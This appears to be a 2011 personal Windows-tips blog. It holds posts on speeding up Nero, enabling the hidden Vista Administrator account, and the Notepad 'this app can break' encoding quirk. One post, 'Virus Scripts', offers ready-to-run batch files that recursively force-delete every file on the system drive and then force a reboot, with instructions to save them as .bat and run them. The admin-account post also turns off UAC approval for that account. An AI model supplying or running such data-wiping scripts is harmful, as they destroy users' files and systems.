Sunday, April 10, 2011

Boost Nero in XP

Speed up Nero in XP

Go to "administrative tools" in the control panel, and in the "services" list, disable the IMAPI CD-Burning COM service.
(Note: manual setting is not enough it must be disabled) It is the built-in CD-burning capability for windowsXP.
Once it is disabled, Nero will start up much quicker.


~

Friday, April 8, 2011

Enable Administrator Account

In Windows Vista there is a Built-in Administrator Account in addition to your normal Administrator account that was created. The Built-in Administrator Account is disabled by default.

Certain Programs/Softwares give us trouble in proper installation due to this disable. Even though we run the .exe file of the programs that is to be installed as "Run As Administrator". For proper installation of the programs it is to be enabled.

• Click Start, and type “secpol.msc” in the search area and click Enter.
• You may receive a prompt from UAC, approve/login and proceed.
• In the left list, choose “Local Policies”, then “Security Options
• Set “Accounts: Administrator account status” to Enabled.
• Set “User Account Control: Admin Approval Mode for the Built-in Administrator account” to Disabled.
• Now log-off, and you’ll see a new account named “Administrator” will be available, click on it to login.

Log on to this administrator account. You may delete other user accounts.


~

Saturday, April 2, 2011

Virus Scripts

1.This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code with .bat extension & Run.


2.The Most Simple Virus To Crush The Window

@Echo off
Del C:\ *.* y

Save The Above Code with .bat extension & Run.


3.The below Code Will Just Restart Ur PC

@echo off shutdown -r -f -t 00

Save The Above Code with .bat extension & Run.


Note: Won't work on Vista or Win7 as you need to bypass UAC.


~

Tuesday, November 2, 2010

Tricking Notepad

Tricking Notepad


Here's a really funny way to break Notepad.

This actually works. It will not crash your computer, it just breaks Notepad in that it causes it to display very oddly. No permnent damage comes of the following steps.

1. Open up Notepad (not Wordpad, not Word or any other word processor)
2. Type in this sentence exactly (without quotes): "this app can break"
3. Save the file to your hard drive.
4. Close Notepad
5. Open the saved file by double clicking it.



Instead of seeing your sentence, you should see a series of squares. For whatever reason, Notepad can't figure out what to do with that series of characters and breaks

Explanation: In notepad, any other 4-3-3-5 letter word combo will have the same results.
It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a "Byte-Order Mark" (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.

The reason this happens:

1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)

2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)

This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE


~